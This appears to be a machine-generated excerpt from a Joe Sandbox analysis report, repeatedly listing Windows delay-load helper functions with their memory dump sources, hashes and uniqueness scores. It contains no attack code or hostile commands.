                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                    • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                    • Opcode Fuzzy Hash: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                    • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                    • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                    • Opcode Fuzzy Hash: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                    • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
